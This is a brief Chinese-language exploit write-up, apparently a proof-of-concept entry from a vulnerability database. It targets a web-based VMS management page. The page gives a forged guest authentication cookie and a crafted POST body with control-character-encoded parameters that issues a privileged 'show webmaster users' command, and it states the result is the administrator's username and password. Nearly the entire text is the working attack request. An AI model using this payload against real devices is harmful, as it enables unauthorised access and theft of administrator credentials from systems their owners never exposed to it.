<p>使用ModifyHeaders修改Cookie头为:</p><pre class="">auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;</pre><p>使用Hackbar发送POST包到:</p><pre class="">http://localhost/WEB_VMS/LEVEL15/</pre><p>内容为:</p><pre class="">command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.<span style="font-family: arial, sans-serif; font-size: 16px; line-height: 1.6; background-color: transparent;"> </span></pre><p><img alt="DD01098A-E0CE-49EE-B8BC-644CA26EA9F6.png" src="https://images.seebug.org/@/uploads/1434695128838-DD01098A-E0CE-49EE-B8BC-644CA26EA9F6.png" data-image-size="524,111"><br></p><p>得到admin的帐号密码。 </p><p><img alt="5FB5B5B1-32E4-485E-9E92-75E54B3DFDC0.png" src="https://images.seebug.org/@/uploads/1434695143339-5FB5B5B1-32E4-485E-9E92-75E54B3DFDC0.png" data-image-size="512,292"><br></p>
京公网安备 11010502034610号
暂无评论